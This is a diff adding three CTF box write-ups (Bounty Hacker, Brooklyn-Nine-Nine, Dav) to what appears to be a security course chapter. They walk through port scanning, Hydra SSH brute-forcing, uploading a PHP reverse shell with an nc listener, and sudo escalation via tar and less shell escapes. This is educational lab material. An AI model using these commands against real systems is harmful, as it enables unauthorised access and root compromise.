issue-97 Add content for End-to-End Attacks

chapters/system-and-data-security/end-to-end-attack/drills/bounty-hacker/sol/index.md

@@ -0,0 +1,75 @@
+# 'Bounty Hacker' box writeup
+
+## Bounty Hacker is a CTF box written by Sevuhl and available on the [TryHackMe platform](https://tryhackme.com)
+
+## Read about [Tar in Linux](https://www.freecodecamp.org/news/tar-in-linux-example-tar-gz-tar-file-and-tar-directory-and-tar-compress-commands/) and [Breaking restricted environment with tar](https://gtfobins.github.io/gtfobins/tar/)
+
+## ![bg](images/background.jpg?raw=true "Title")
+
++ **We deploy the machine and start with an nmap scan for open ports**
+
+``nmap -sV -sC -oN scan1 10.10.229.13``
+
++ **We can see 3 open ports with some well known services: ftp, ssh and http, all opened on default ports**
+
+![1](images/nmap_scan.jpg?raw=true "Nmap_scan")
+
++ **Next, we will try to connect to the ftp service using the default user anonymous**
+
+![2](images/ftp_login.jpg?raw=true "Ftp_login")
+
++ **Listing the directory, we can observe two `.txt` files uploaded so let's get them**
+
+``mget *.txt``
+
++ **Reading the `task.txt` file, we can find out who wrote the task list, giving us the first task answer.**
+**We list the second txt file, named `locks.txt`, and we can see multiple strings which seems to be some passwords kept in the ftp server.**
+
+```text
+rEddrAGON
+ReDdr4g0nSynd!cat3
+Dr@gOn$yn9icat3
+R3DDr46ONSYndIC@Te
+ReddRA60N
+R3dDrag0nSynd1c4te
+dRa6oN5YNDiCATE
+ReDDR4g0n5ynDIc4te
+R3Dr4gOn2044
+RedDr4gonSynd1cat3
+R3dDRaG0Nsynd1c@T3
+...
+```
+
++ **Let's try to use this password file to connect on the ssh service, using simultaneously the user found in the previous task.**
+**The Hydra tool has a brute-force option to crack the login of the ssh service, so we can use it**
+
+```console
+hydra -l lin -P locks.txt 10.10.229.13 -t 4 ssh
+```
+
++ **After we execute the brute-force process, Hydra give us the needed user password**
+
+![3](images/hydra_brute.jpg?raw=true "Hydra")
+
++ **With the given credentials, we will connect to the ssh service**
+
+``ssh lin@10.10.229.13``
+
++ **We land on the wanted system so we can read our first user flag**
+
+![4](images/first_flag.jpg?raw=true "first_flag")
+
++ **Running the** ``sudo -l`` **command on @lin user and listing the allowed commands, we can see that user @lin may run the following commands on bountyhacker:**
+      ``(root) /bin/tar``
+
+![5](images/whoami.jpg?raw=true "whoami")
+
++ **Tar is a linux archiving utility, used by a lot of unix system administrators to create compressed archive files or to extract them. Looking into the tar manual, we can see that it has an option that can execute a command during the compress-program**
+
+![6](images/tar.jpg?raw=true "tar manual")
+
++ **That being said, let's try to break our environment and spawn a shell using privilege escalation, getting access to the @root user**
+
+``sudo tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'``
+
+![Alt text](images/root_flag.jpg?raw=true "root_flag")

chapters/system-and-data-security/end-to-end-attack/drills/brooklyn-nine-nine/sol/index.md

@@ -0,0 +1,70 @@
+# 'Brooklyn-Nine-Nine' box writeup
+
+## Brooklyn-Nine-Nine is a CTF box written by Fsociety2006 and available on the [TryHackMe](https://tryhackme.com/) platform
+
+## Read about [Less Command](https://linuxize.com/post/less-command-in-linux/) and [Privilege Escalation using find, vim, less or bash](https://pentestlab.blog/category/privilege-escalation/)
+
+![bg](images/background.jpeg)
+
+## Foothold
+
++ **Let's deploy our machine and start with a nmap scan for ports**
+
+``nmap -sV -sC -oN scan1 10.10.244.52``
+
++ **We can clearly see 3 ports open, a ftp, ssh and a http, all configured on default ports**
+
+![1](images/nmap_scan_bnn.jpg)
+
+**From the nmap report, the ftp anonymous login seems to be possible, so let's try it.**
+
+``ftp 10.10.244.52``
+
+![2](images/ftp.jpg)
+
+**We successfully connected and we can see a** `note_to_jake.txt` **file inside the ftp server.**
+**We can get that file and read it**
+
+``get note_to_jake.txt``
+![3](images/change_password.jpg)
+
++ **Looks that Jake need to change his password.**
+**Because jake is using a very weak password, maybe we can brute-force his login to some service.**
+**Let's use hydra to brute-force the ssh service - I'm using the `rockyou.txt` wordlist**
+
+```console
+hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.244.52 -t 4 ssh
+```
+
+![4](images/hydra.jpg)
+
+## User escalation
+
++ **So here we got some ssh credentials.**
+**Let's connect on the ssh service and run a** ``sudo -l`` **command on the jake user**
+
+![5](images/less.jpg)
+
+**It looks like jake can run the less command with su privilege.**
+**Less is a command which can display content of a file and we can navigate both forward and backward through the file.**
+**Let's try to read the user flag.**
+
+``sudo less /home/holt/user.txt``
+
+[6](images/user_flag_1.jpg)
+
+## Root escalation
+
++ **And here it is our first flag.**
+**We can also use less to get a privesc and get root access.**
+**Let's read a file with less**
+
+``less /etc/passwd``
+
+**Then generate a shell for the root user.**
+
+``!/bin/sh``
+
+![7](images/binsh.jpg)
+
+![8](images/root_flag_2.jpg)

chapters/system-and-data-security/end-to-end-attack/drills/dav/sol/index.md

@@ -0,0 +1,88 @@
+# 'Dav' box writeup
+
+## Dav is a CTF box created by stuxnet and available on the [TryHackMe platform](https://tryhackme.com)
+
+## Read about [WebDAV](https://en.wikipedia.org/wiki/WebDAV), [Dav default credentials](http://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html) and [Cadaver, the WebDAV client](https://docs.oracle.com/html/E10235_03/webdav007.htm)
+
+![bg](images/background.jpeg?raw=true "Title")
+
+## Foothold
+
++ **We deploy the machine and start with a nmap scan for open ports**
+
+``nmap -sV -sC -oN scan1 10.10.62.166``
+
++ **From our result, we can see that the 80 port is open, which is running an Appache with a default page**
+
+![nmap](images/nmap_dirb_scan.jpg?raw=true "nmap")
+
++ **Let's run a gobuster search too and see our results. It seems that a webdav service is running**
+
+``gobuster dir -u http://10.10.62.166/ -w /usr/share/wordlists/dirb/common.txt``
+
+![dirb](images/nmap_dirb_scan2.jpg?raw=true "dirb")
+
+**Navigating to the /webdav directory, the login page shows up.**
+**We need some credentials, and searching on google we can find some.**
+
+[login](images/login.png?raw=true "login")
+
+``user: wampp``
+
+``pass: xampp``
+
++ **After we log in, we can see a file named `passwd.dav` inside the directory**
+
+[webdav](images/webdav.jpg?raw=true "webdav")
+
++ **Reading the file, it seems to be some credentials with a hashed password.**
+**Trying to unhashed it, i realised it's nothing that we can do with it so i continued to read about WebDAV service.**
+**It has some similarities with the ftp, among with the cadaver: we can upload some files in that /webdav directory.**
+**Let's login with the cadaver, the WebDAV client, using the same default credentials**
+
+``cadaver http://10.10.62.166/webdav/``
+
+``Username: wampp``
+
+``Password: xampp``
+
++ **Now, let's try to upload a reverse php shell.**
+**I use the [pentestmonkey reverse shell](https://github.com/pentestmonkey/php-reverse-shell).**
+**Get it and modify the $ip parameter with your tryhackme tunneled ip and then upload it on our webdav directory**
+
+``put php-reverse-shell.php``
+
+[php](images/php-reverse-shell.jpg)
+
+[php](images/uploaded.jpg)
+
++ **It seems like our reverse shell was uploaded, so let's start a nc listener and access our php shell file**
+
+``nc -lvnp 1234``
+
+``http://10.10.62.166/webdav/php-reverse-shell.php``
+
+![werein](images/werein.jpg)
+
+## User escalation
+
+**And we're in.**
+**Let's spawn an interactive shell and read our first flag, located inside the home directory of the merlin user.**
+
+```console
+python -c 'import pty;pty.spawn("/bin/bash")'
+```
+
+![in](images/usermer.jpg)
+
+## Root escalation
+
++ **Let's run a ``sudo -l`` command to see what commands www-data user can run**
+
+![sudol](images/sudol.jpg)
+
++ **It seems that the we can run the cat command with super user privileges so we can read our root flag**
+
+``sudo cat /root/root.txt``
+
+![root](images/rootflagoz.jpg)